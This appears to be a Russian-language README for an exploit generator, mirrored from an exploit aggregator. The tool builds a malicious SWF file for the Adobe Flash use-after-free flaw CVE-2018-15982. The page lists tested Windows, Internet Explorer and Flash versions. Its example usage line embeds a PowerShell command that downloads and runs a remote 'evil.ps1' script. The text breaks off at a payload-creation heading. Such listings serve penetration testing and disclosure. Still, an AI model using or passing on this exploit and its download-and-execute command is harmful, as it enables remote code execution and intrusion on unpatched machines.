## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KPHONGAGSORN-ADOBE-FLASH-CVE2018-15982
# Adobe Flash CVE-2018-15982
Этот скрипт создает swf-нагрузку для CVE-2018-15982, основанную на PoC из https://github.com/smgorelik/Windows-RCE-exploits. Уязвимость была обнаружена Chenming Xu и Ed Miles из Gigamon ATR.
Уязвимость представляет собой ошибку типа use-after-free, позволяющую выполнить произвольный код в Flash. Дополнительную информацию можно найти по ссылкам ниже.
* https://threatpost.com/adobe-patches-zero-day-vulnerability-in-flash-player/139629/
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-15982
Примечание: в настоящее время происходит распыление только одного блока — я заметил это после создания скрипта.
Использование:
`python create_swf.py <команда> <имя выходного файла>`
Пример использования:
`python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf`
Протестировано на:
* Windows 10 Enterprise 10.0.17134, Internet Explorer 11.285.17134.0
* Adobe Flash 31.0.0.153, 29.0.0.140
## Пример
Создание нагрузки:
